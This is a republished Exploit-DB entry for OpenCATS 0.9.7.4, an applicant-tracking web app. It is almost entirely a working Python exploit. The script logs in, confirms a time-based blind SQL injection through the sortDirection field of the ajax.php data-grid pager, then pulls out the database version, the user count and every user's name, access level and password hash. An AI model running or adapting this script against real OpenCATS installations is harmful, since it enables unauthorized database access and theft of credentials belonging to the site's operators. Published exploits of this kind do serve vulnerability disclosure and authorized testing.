[webapps] OpenCATS 0.9.7.4

[webapps] OpenCATS 0.9.7.4 - SQL Injection
# Exploit Title: OpenCATS 0.9.7.4 - SQL Injection 2026-5-27 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:3 收藏

# Exploit Title: OpenCATS 0.9.7.4 - SQL Injection
# Exploit Author: Gabriel Rodrigues (TEXUGO) from HAKAI
# Vendor Homepage: https://www.opencats.org
# Software Link: https://github.com/opencats/OpenCATS
# Version: <= 0.9.7.4
# Tested on: Ubuntu 22.04 / Apache2 / PHP / MariaDB 10.6
# CVE: N/A (GHSA-8mc8-5gw6-c7w4)
import requests, json, sys, time

url   = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8888"
user  = sys.argv[2] if len(sys.argv) > 2 else "admin"
pw    = sys.argv[3] if len(sys.argv) > 3 else "cats"
delay = 1.5

s = requests.Session()
s.get(f"{url}/index.php")
s.post(f"{url}/index.php?m=login&a=attemptLogin", data={"username": user, "password": pw}, allow_redirects=True)

def sqli(payload):
    t = time.time()
    s.get(f"{url}/ajax.php", timeout=30, params={"f": "getDataGridPager",
        "i": "candidates:candidatesListByViewDataGrid",
        "p": json.dumps({"sortBy": "dateModifiedSort", "sortDirection": payload, "rangeStart": 0, "maxResults": 15})})
    return time.time() - t

def blind(cond):
    return sqli(f"DESC,IF(({cond}),SLEEP({delay}),0)") > delay * 0.6

def extract(query, maxlen=100):
    out = ""
    for i in range(1, maxlen + 1):
        if blind(f"LENGTH({query})<{i}"): break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            lo, hi = (mid + 1, hi) if blind(f"ORD(SUBSTRING({query},{i},1))>{mid}") else (lo, mid)
        out += chr(lo)
    return out

base = sqli("DESC")
slp  = sqli("DESC,SLEEP(2)")
print(f"baseline={base:.2f}s  sleep(2)={slp:.2f}s")
assert slp > base + 1, "not vulnerable or no candidate rows"
print("injection confirmed\n")

print("version:", extract("@@version", 30))
print("database:", extract("DATABASE()", 20))

n = int(extract("(SELECT COUNT(*) FROM user)", 3))
print(f"users: {n}\n")
for i in range(n):
    name  = extract(f"(SELECT user_name FROM user ORDER BY user_id LIMIT {i},1)", 40)
    level = extract(f"(SELECT access_level FROM user ORDER BY user_id LIMIT {i},1)", 5)
    hash_ = extract(f"(SELECT password FROM user ORDER BY user_id LIMIT {i},1)", 62)
    print(f"  {name}  level={level}  hash={hash_}")

文章来源: https://www.exploit-db.com/exploits/52579
如有侵权请联系:admin#unsafe.sh